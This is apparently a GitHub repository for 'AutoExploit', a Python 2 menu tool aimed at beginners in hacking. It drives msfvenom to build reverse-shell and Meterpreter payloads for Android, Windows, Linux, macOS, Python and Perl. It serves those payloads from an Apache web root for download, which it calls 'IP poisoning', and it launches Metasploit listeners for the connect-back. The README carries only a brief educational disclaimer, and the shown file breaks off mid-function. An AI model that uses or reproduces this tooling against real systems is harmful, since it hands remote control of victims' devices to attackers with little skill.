├── _config.yml
├── CONTRIBUTING.md
├── run
├── .github
├── workflows
│ ├── greetings.yml
│ ├── pythonapp.yml
│ └── codacy-analysis.yml
├── FUNDING.yml
└── ISSUE_TEMPLATE
│ ├── feature_request.md
│ └── bug_report.md
├── SECURITY.md
├── README.md
├── CODE_OF_CONDUCT.md
├── LICENSE
├── AutoExploit.py
└── core
└── run.py
/_config.yml:
--------------------------------------------------------------------------------
1 | theme: jekyll-theme-cayman
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | Please Don't Fork for Personalization or Renaming the Projects.
2 | Just Contribute for patch.
3 | Use Latest Version of Code.
4 |
--------------------------------------------------------------------------------
/run:
--------------------------------------------------------------------------------
1 | sudo apt install figlet
2 | clear
3 | figlet "AutoExploit"
4 | echo "Welcome To AutoExploit Installer"
5 | echo "Auto Exploit is a Exploitation Tool Edited By Mr ROBOT in Python Scripting Language"
6 | chmod +x core/run.py
7 | python core/run.py
8 |
--------------------------------------------------------------------------------
/.github/workflows/greetings.yml:
--------------------------------------------------------------------------------
1 | name: Greetings
2 |
3 | on: [pull_request, issues]
4 |
5 | jobs:
6 | greeting:
7 | runs-on: ubuntu-latest
8 | steps:
9 | - uses: actions/first-interaction@v1
10 | with:
11 | repo-token: ${{ secrets.GITHUB_TOKEN }}
12 | issue-message: 'Message that will be displayed on users'' first issue'
13 | pr-message: 'Message that will be displayed on users'' first pr'
14 |
--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | # These are supported funding model platforms
2 |
3 | github: # iamsaqibkhans
4 | patreon: # Replace with a single Patreon username
5 | open_collective: # Replace with a single Open Collective username
6 | ko_fi: # Replace with a single Ko-fi username
7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
9 | liberapay: # Replace with a single Liberapay username
10 | issuehunt: # Replace with a single IssueHunt username
11 | otechie: # Replace with a single Otechie username
12 | custom: https://www.paypal.me/iamsaqibkhans
13 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Feature request
3 | about: Suggest an idea for this project
4 | title: ''
5 | labels: ''
6 | assignees: ''
7 |
8 | ---
9 |
10 | **Is your feature request related to a problem? Please describe.**
11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
12 |
13 | **Describe the solution you'd like**
14 | A clear and concise description of what you want to happen.
15 |
16 | **Describe alternatives you've considered**
17 | A clear and concise description of any alternative solutions or features you've considered.
18 |
19 | **Additional context**
20 | Add any other context or screenshots about the feature request here.
21 |
--------------------------------------------------------------------------------
/SECURITY.md:
--------------------------------------------------------------------------------
1 | # Security Policy
2 |
3 | ## Supported Versions
4 |
5 | Use this section to tell people about which versions of your project are
6 | currently being supported with security updates.
7 |
8 | | Version | Supported |
9 | | ------- | ------------------ |
10 | | 5.1.x | :white_check_mark: |
11 | | 5.0.x | :x: |
12 | | 4.0.x | :white_check_mark: |
13 | | < 4.0 | :x: |
14 |
15 | ## Reporting a Vulnerability
16 |
17 | Use this section to tell people how to report a vulnerability.
18 |
19 | Tell them where to go, how often they can expect to get an update on a
20 | reported vulnerability, what to expect if the vulnerability is accepted or
21 | declined, etc.
22 |
--------------------------------------------------------------------------------
/.github/workflows/pythonapp.yml:
--------------------------------------------------------------------------------
1 | name: Python application
2 |
3 | on: [push]
4 |
5 | jobs:
6 | build:
7 |
8 | runs-on: ubuntu-latest
9 |
10 | steps:
11 | - uses: actions/checkout@v1
12 | - name: Set up Python 3.7
13 | uses: actions/setup-python@v1
14 | with:
15 | python-version: 3.7
16 | - name: Install dependencies
17 | run: |
18 | python -m pip install --upgrade pip
19 | pip install -r requirements.txt
20 | - name: Lint with flake8
21 | run: |
22 | pip install flake8
23 | # stop the build if there are Python syntax errors or undefined names
24 | flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
25 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
26 | flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
27 | - name: Test with pytest
28 | run: |
29 | pip install pytest
30 | pytest
31 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Bug report
3 | about: Create a report to help us improve
4 | title: ''
5 | labels: ''
6 | assignees: ''
7 |
8 | ---
9 |
10 | **Describe the bug**
11 | A clear and concise description of what the bug is.
12 |
13 | **To Reproduce**
14 | Steps to reproduce the behavior:
15 | 1. Go to '...'
16 | 2. Click on '....'
17 | 3. Scroll down to '....'
18 | 4. See error
19 |
20 | **Expected behavior**
21 | A clear and concise description of what you expected to happen.
22 |
23 | **Screenshots**
24 | If applicable, add screenshots to help explain your problem.
25 |
26 | **Desktop (please complete the following information):**
27 | - OS: [e.g. iOS]
28 | - Browser [e.g. chrome, safari]
29 | - Version [e.g. 22]
30 |
31 | **Smartphone (please complete the following information):**
32 | - Device: [e.g. iPhone6]
33 | - OS: [e.g. iOS8.1]
34 | - Browser [e.g. stock browser, safari]
35 | - Version [e.g. 22]
36 |
37 | **Additional context**
38 | Add any other context about the problem here.
39 |
--------------------------------------------------------------------------------
/.github/workflows/codacy-analysis.yml:
--------------------------------------------------------------------------------
1 | # This workflow checks out code, performs a Codacy security scan
2 | # and integrates the results with the
3 | # GitHub Advanced Security code scanning feature. For more information on
4 | # the Codacy security scan action usage and parameters, see
5 | # https://github.com/codacy/codacy-analysis-cli-action.
6 | # For more information on Codacy Analysis CLI in general, see
7 | # https://github.com/codacy/codacy-analysis-cli.
8 |
9 | name: Codacy Security Scan
10 |
11 | on:
12 | push:
13 | branches: [ master ]
14 | pull_request:
15 | branches: [ master ]
16 |
17 | jobs:
18 | codacy-security-scan:
19 | name: Codacy Security Scan
20 | runs-on: ubuntu-latest
21 | steps:
22 | # Checkout the repository to the GitHub Actions runner
23 | - name: Checkout code
24 | uses: actions/checkout@v2
25 |
26 | # Execute Codacy Analysis CLI and generate a SARIF output with the security issues identified during the analysis
27 | - name: Run Codacy Analysis CLI
28 | uses: codacy/codacy-analysis-cli-action@1.1.0
29 | with:
30 | # Check https://github.com/codacy/codacy-analysis-cli#project-token to get your project token from your Codacy repository
31 | # You can also omit the token and run the tools that support default configurations
32 | project-token: ${{ secrets.CODACY_PROJECT_TOKEN }}
33 | verbose: true
34 | output: results.sarif
35 | format: sarif
36 | # Adjust severity of non-security issues
37 | gh-code-scanning-compat: true
38 | # Force 0 exit code to allow SARIF file generation
39 | # This will handover control about PR rejection to the GitHub side
40 | max-allowed-issues: 2147483647
41 |
42 | # Upload the SARIF file generated in the previous step
43 | - name: Upload SARIF results file
44 | uses: github/codeql-action/upload-sarif@v1
45 | with:
46 | sarif_file: results.sarif
47 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # AutoExploit
2 |
3 | AutoExploit Generate Automatic Metasploit Payload And Exploit.
4 | AutoExploit written by Mr ROBOT in Python Scripting Language.
5 | AutoExploit is Being Made for n00b user who don't know about Metasploit msfconsole command and beginner in Hacking Field.
6 | > AutoExploit is only for Educational & Research Purpose. Please Don't use this for any Illegal Activities.
7 |
8 | ==========================================================================================================================
9 | # List Of Payload
10 | ## Binary Payload
11 | - Android
12 | - Windows
13 | - MacOS
14 | - Linux Bash
15 | ## Scripting Payload
16 | - Python
17 | - Bash
18 | ## Web Payload
19 | - ASP
20 | - JSP
21 | - WAR
22 | ## Encryption
23 | - APK Encryption
24 | - Python Encryption
25 |
26 |
27 |
28 |
29 |
30 |
31 | ==========================================================================================================================
32 | # Required Package
33 | ###### • Python 2
34 | ###### • Metasploit Framework
35 | ###### • Git
36 | =========================================================================================================================
37 |
38 | # Installation Guide
39 |
40 |
41 |
No Need to install.
42 | Type git clone https://github.com/iamsaqibkhans/AutoExploit
43 | And Give A Execute Permission to run file using chomod +x run
44 | To Launch Script Type ./run in Your Terminal
45 | =========================================================================================================================
46 |
47 | ## Become A Sponsor of this Tools
48 |
49 | To Become A Sponsor Please Donate on [PayPal] (https://paypal.me/iamsaqibkhans)
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 | > © Saqib S Khan 2020
61 | > Sponsored By Mr ROBOT
62 |
63 | # Contact Us
64 | eMail: MrPentester@pm.me
65 | Facebook: https://facebook.com/iamsaqibkhans
66 |
67 |
68 |
69 |
--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
1 | # Contributor Covenant Code of Conduct
2 |
3 | ## Our Pledge
4 |
5 | In the interest of fostering an open and welcoming environment, we as
6 | contributors and maintainers pledge to making participation in our project and
7 | our community a harassment-free experience for everyone, regardless of age, body
8 | size, disability, ethnicity, sex characteristics, gender identity and expression,
9 | level of experience, education, socio-economic status, nationality, personal
10 | appearance, race, religion, or sexual identity and orientation.
11 |
12 | ## Our Standards
13 |
14 | Examples of behavior that contributes to creating a positive environment
15 | include:
16 |
17 | * Using welcoming and inclusive language
18 | * Being respectful of differing viewpoints and experiences
19 | * Gracefully accepting constructive criticism
20 | * Focusing on what is best for the community
21 | * Showing empathy towards other community members
22 |
23 | Examples of unacceptable behavior by participants include:
24 |
25 | * The use of sexualized language or imagery and unwelcome sexual attention or
26 | advances
27 | * Trolling, insulting/derogatory comments, and personal or political attacks
28 | * Public or private harassment
29 | * Publishing others' private information, such as a physical or electronic
30 | address, without explicit permission
31 | * Other conduct which could reasonably be considered inappropriate in a
32 | professional setting
33 |
34 | ## Our Responsibilities
35 |
36 | Project maintainers are responsible for clarifying the standards of acceptable
37 | behavior and are expected to take appropriate and fair corrective action in
38 | response to any instances of unacceptable behavior.
39 |
40 | Project maintainers have the right and responsibility to remove, edit, or
41 | reject comments, commits, code, wiki edits, issues, and other contributions
42 | that are not aligned to this Code of Conduct, or to ban temporarily or
43 | permanently any contributor for other behaviors that they deem inappropriate,
44 | threatening, offensive, or harmful.
45 |
46 | ## Scope
47 |
48 | This Code of Conduct applies both within project spaces and in public spaces
49 | when an individual is representing the project or its community. Examples of
50 | representing a project or community include using an official project e-mail
51 | address, posting via an official social media account, or acting as an appointed
52 | representative at an online or offline event. Representation of a project may be
53 | further defined and clarified by project maintainers.
54 |
55 | ## Enforcement
56 |
57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
58 | reported by contacting the project team at iamsaqibkhans@yahoo.com. All
59 | complaints will be reviewed and investigated and will result in a response that
60 | is deemed necessary and appropriate to the circumstances. The project team is
61 | obligated to maintain confidentiality with regard to the reporter of an incident.
62 | Further details of specific enforcement policies may be posted separately.
63 |
64 | Project maintainers who do not follow or enforce the Code of Conduct in good
65 | faith may face temporary or permanent repercussions as determined by other
66 | members of the project's leadership.
67 |
68 | ## Attribution
69 |
70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
72 |
73 | [homepage]: https://www.contributor-covenant.org
74 |
75 | For answers to common questions about this code of conduct, see
76 | https://www.contributor-covenant.org/faq
77 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [2020] [Saqib S Khan]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/AutoExploit.py:
--------------------------------------------------------------------------------
1 | #Coded_By_Saqib_S_Khan
2 |
3 | import os
4 | import sys
5 | import urllib
6 | ##################################
7 | yes = set(['yes','y', 'ye', 'Y'])
8 | no = set(['no','n'])
9 | G = '\033[92m' #green
10 | Y = '\033[93m' #yellow
11 | B = '\033[94m' #blue
12 | R = '\033[91m' #red
13 | W = '\033[0m' #white
14 | ##################################
15 | #################### Banner #######################
16 |
17 | def banner():
18 | print ("""
19 |
20 | %s_ _ _____ _ _ _
21 |
22 | "mm m mmmmmm ""# " m$
23 | ## m m mm#mm mmm # m m mmmm # mmm mmm mm#mm$
24 | # # # # # #" "# #mmmmm #m# #" "# # #" "# # #$
25 | #mm# # # # # # # m#m # # # # # # #$
26 | # # "mm"# "mm "#m#" #mmmmm m" "m ##m#" "mm "#m#" mm#mm "mm$
27 | #
28 |
29 | %s
30 | |_|
31 | [+] Metasploit Payload Generator For Newbies [+]
32 | [+] Edited By Mr ROBOT & AutoExploit Team [+]
33 | [+] Email : MrPentester@pm.me [+]
34 |
35 |
36 | %s
37 | List payloads:
38 |
39 | 1) Binaries Payloads
40 | 2) Scripting Payloads
41 | 3) Web Payloads
42 | 4) Encrypters
43 | 0) Exit
44 | """%(R,G,B))
45 | banner = raw_input(" Select from the menu : ")
46 | print("")
47 |
48 | if banner == "1":
49 | bin()
50 | elif banner == "2":
51 | script()
52 | elif banner == "3":
53 | web()
54 | elif banner == "4":
55 | enc()
56 |
57 | else:
58 | sys.exit();
59 | #################### BANNER #######################
60 |
61 | def msf():
62 | print "Do You Want To Install it ? : "
63 | ch = raw_input()
64 | if ch in yes :
65 | os.system("curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall")
66 | else :
67 | print "OK BB !"
68 | sys.exit(0)
69 |
70 |
71 | def clear():
72 | if os.name == 'nt':
73 | os.system('cls')
74 | else:
75 | os.system('clear')
76 | ###############################
77 | def bin():
78 | print("""
79 | 1) Android
80 | 2) Windows
81 | 3) Linux
82 | 4) Mac OS
83 | 0) Back to menu
84 | """)
85 |
86 | bn = raw_input("Set Payload: ")
87 | print("")
88 | if bn == "1":
89 | android()
90 | elif bn == "2":
91 | windows()
92 | elif bn == "3":
93 | linux()
94 | elif bn == "4":
95 | mac()
96 | else:
97 | banner()
98 |
99 | def web():
100 | print("""
101 | 1) ASP
102 | 2) JSP
103 | 3) War
104 | 0) Back to menu
105 |
106 | """)
107 |
108 | wb = raw_input("Set Payload: ")
109 | print("")
110 | if wb == "1":
111 | asp()
112 | elif wb == "2":
113 | jsp()
114 | elif wb == "3":
115 | war()
116 | else:
117 | banner()
118 |
119 | def script():
120 | print("""
121 | 1) Python
122 | 2) Perl
123 | 3) Bash
124 | 0) Back to menu
125 |
126 | """)
127 |
128 | sc = raw_input("Set Payload: ")
129 | print("")
130 | if sc == "1":
131 | python()
132 | elif sc == "2":
133 | perl()
134 | elif sc == "3":
135 | bash()
136 | else:
137 | banner()
138 |
139 | def enc():
140 | print("""
141 | 1) APK Encrypter
142 | 2) Python Encrypter
143 | 0) Back to menu
144 |
145 | """)
146 | en = raw_input("Select Encrypter : ")
147 | print("")
148 | if en == "1":
149 | apkenc()
150 | elif en == "2":
151 | pyenc()
152 | else:
153 | banner()
154 |
155 |
156 | def android():
157 | lhost = raw_input("Enter LHOST: ")
158 | lport = raw_input("Enter LPORT: ")
159 | name = raw_input("Enter Payload Name: ")
160 | os.system("msfvenom -p android/meterpreter/reverse_tcp LHOST=%s LPORT=%s R > %s.apk"%(lhost,lport,name))
161 | clear()
162 | print "Payload Successfuly Generated"
163 | print "[1]-Do You Want To Start a listenner"
164 | print "[2]-Do You Want To Start an IP Poisener "
165 | li = raw_input()
166 | if li == '2' :
167 | os.system('sudo service apache2 start')
168 | os.system('sudo cp %s.apk /var/www/html'%(name))
169 | print "Your IP Successfully Poisened : %s/%s.apk"%(lhost,name)
170 | listen = """
171 | use exploit/multi/handler
172 | set PAYLOAD android/meterpreter/reverse_tcp
173 | set LHOST {0}
174 | set LPORT {1}
175 | exploit
176 | """.format(lhost,lport)
177 | with open('listener.rc', 'w') as f :
178 | f.write(listen)
179 | os.system('msfconsole -r listener.rc')
180 |
181 | else :
182 | listen = """
183 | use exploit/multi/handler
184 | set PAYLOAD android/meterpreter/reverse_tcp
185 | set LHOST {0}
186 | set LPORT {1}
187 | exploit
188 | """.format(lhost,lport)
189 | with open('listener.rc', 'w') as f :
190 | f.write(listen)
191 | os.system('msfconsole -r listener.rc')
192 | def windows():
193 | lhost = raw_input("Enter LHOST: ")
194 | lport = raw_input("Enter LPORT: ")
195 | name = raw_input("Enter Payload Name: ")
196 | os.system("msfvenom -p windows/shell/reverse_tcp LHOST=%s LPORT=%s -f exe > %s.exe"%(lhost,lport,name))
197 | clear()
198 | print "Payload Successfuly Generated"
199 | print "[1]-Do You Want To Start a listenner"
200 | print "[2]-Do You Want To Start an IP Poisener "
201 | li = raw_input()
202 | if li == '2' :
203 | os.system('sudo service apache2 start')
204 | os.system('sudo cp %s.exe /var/www/html'%(name))
205 | print "Your IP Successfully Poisened : %s/%s.exe"%(lhost,name)
206 | listen = """
207 | use exploit/multi/handler
208 | set PAYLOAD windows/shell/reverse_tcp
209 | set LHOST {0}
210 | set LPORT {1}
211 | exploit
212 | """.format(lhost,lport)
213 | with open('listener.rc', 'w') as f :
214 | f.write(listen)
215 | os.system('msfconsole -r listener.rc')
216 |
217 | else :
218 | listen = """
219 | use exploit/multi/handler
220 | set PAYLOAD windows/shell/reverse_tcp
221 | set LHOST {0}
222 | set LPORT {1}
223 | exploit
224 | """.format(lhost,lport)
225 | with open('listener.rc', 'w') as f :
226 | f.write(listen)
227 | os.system('msfconsole -r listener.rc')
228 |
229 | def linux():
230 | lhost = raw_input("Enter LHOST: ")
231 | lport = raw_input("Enter LPORT: ")
232 | name = raw_input("Enter Payload Name: ")
233 | os.system("msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=%s LPORT=%s -f elf > %s.elf"%(lhost,lport,name))
234 | clear()
235 | print "Payload Successfuly Generated"
236 | print "[1]-Do You Want To Start a listenner"
237 | print "[2]-Do You Want To Start an IP Poisener "
238 | li = raw_input()
239 | if li == '2' :
240 | os.system('sudo service apache2 start')
241 | os.system('sudo cp %s.elf /var/www/html'%(name))
242 | print "Your IP Successfully Poisened : %s/%s.elf"%(lhost,name)
243 | listen = """
244 | use exploit/multi/handler
245 | set PAYLOAD linux/x86/meterpreter/reverse_tcp
246 | set LHOST {0}
247 | set LPORT {1}
248 | exploit
249 | """.format(lhost,lport)
250 | with open('listener.rc', 'w') as f :
251 | f.write(listen)
252 | os.system('msfconsole -r listener.rc')
253 |
254 | else :
255 | listen = """
256 | use exploit/multi/handler
257 | set PAYLOAD linux/x86/meterpreter/reverse_tcp
258 | set LHOST {0}
259 | set LPORT {1}
260 | exploit
261 | """.format(lhost,lport)
262 | with open('listener.rc', 'w') as f :
263 | f.write(listen)
264 | os.system('msfconsole -r listener.rc')
265 |
266 |
267 | def mac():
268 | lhost = raw_input("Enter LHOST: ")
269 | lport = raw_input("Enter LPORT: ")
270 | name = raw_input("Enter Payload Name: ")
271 | os.system("msfvenom -p osx/x86/shell_reverse_tcp LHOST=%s LPORT=%s -f macho > %s.macho"%(lhost,lport,name))
272 | clear()
273 | print "Payload Successfuly Generated"
274 | print "[1]-Do You Want To Start a listenner"
275 | print "[2]-Do You Want To Start an IP Poisener "
276 | li = raw_input()
277 | if li == '2' :
278 | os.system('sudo service apache2 start')
279 | os.system('sudo cp %s.macho /var/www/html'%(name))
280 | print "Your IP Successfully Poisened : %s/%s.macho"%(lhost,name)
281 | listen = """
282 | use exploit/multi/handler
283 | set PAYLOAD osx/x86/shell_reverse_tcp
284 | set LHOST {0}
285 | set LPORT {1}
286 | exploit
287 | """.format(lhost,lport)
288 | with open('listener.rc', 'w') as f :
289 | f.write(listen)
290 | os.system('msfconsole -r listener.rc')
291 |
292 | else :
293 | listen = """
294 | use exploit/multi/handler
295 | set PAYLOAD osx/x86/shell_reverse_tcp
296 | set LHOST {0}
297 | set LPORT {1}
298 | exploit
299 | """.format(lhost,lport)
300 | with open('listener.rc', 'w') as f :
301 | f.write(listen)
302 | os.system('msfconsole -r listener.rc')
303 |
304 |
305 |
306 | def python():
307 | lhost = raw_input("Enter LHOST: ")
308 | lport = raw_input("Enter LPORT: ")
309 | name = raw_input("Enter Payload Name: ")
310 | os.system("msfvenom -p cmd/unix/reverse_python LHOST=%s LPORT=%s -f raw > %s.py"%(lhost,lport,name))
311 | clear()
312 | print "Payload Successfuly Generated"
313 | print "[1]-Do You Want To Start a listenner"
314 | print "[2]-Do You Want To Start an IP Poisener "
315 | li = raw_input()
316 | if li == '2' :
317 | os.system('sudo service apache2 start')
318 | os.system('sudo cp %s.py /var/www/html'%(name))
319 | print "Your IP Successfully Poisened : %s/%s.py"%(lhost,name)
320 | listen = """
321 | use exploit/multi/handler
322 | set PAYLOAD cmd/unix/reverse_python
323 | set LHOST {0}
324 | set LPORT {1}
325 | exploit
326 | """.format(lhost,lport)
327 | with open('listener.rc', 'w') as f :
328 | f.write(listen)
329 | os.system('msfconsole -r listener.rc')
330 |
331 | else :
332 | listen = """
333 | use exploit/multi/handler
334 | set PAYLOAD cmd/unix/reverse_python
335 | set LHOST {0}
336 | set LPORT {1}
337 | exploit
338 | """.format(lhost,lport)
339 | with open('listener.rc', 'w') as f :
340 | f.write(listen)
341 | os.system('msfconsole -r listener.rc')
342 |
343 |
344 | def perl():
345 | lhost = raw_input("Enter LHOST: ")
346 | lport = raw_input("Enter LPORT: ")
347 | name = raw_input("Enter Payload Name: ")
348 | os.system("msfvenom -p cmd/unix/reverse_perl LHOST=%s LPORT=%s -f raw > %s.pl"%(lhost,lport,name))
349 | clear()
350 | print "Payload Successfuly Generated"
351 | print "[1]-Do You Want To Start a listenner"
352 | print "[2]-Do You Want To Start an IP Poisener "
353 | li = raw_input()
354 | if li == '2' :
355 | os.system('sudo service apache2 start')
356 | os.system('sudo cp %s.pl /var/www/html'%(name))
357 | print "Your IP Successfully Poisened : %s/%s.pl"%(lhost,name)
358 | listen = """
359 | use exploit/multi/handler
360 | set PAYLOAD cmd/unix/reverse_perl
361 | set LHOST {0}
362 | set LPORT {1}
363 | exploit
364 | """.format(lhost,lport)
365 | with open('listener.rc', 'w') as f :
366 | f.write(listen)
367 | os.system('msfconsole -r listener.rc')
368 |
369 | else :
370 | listen = """
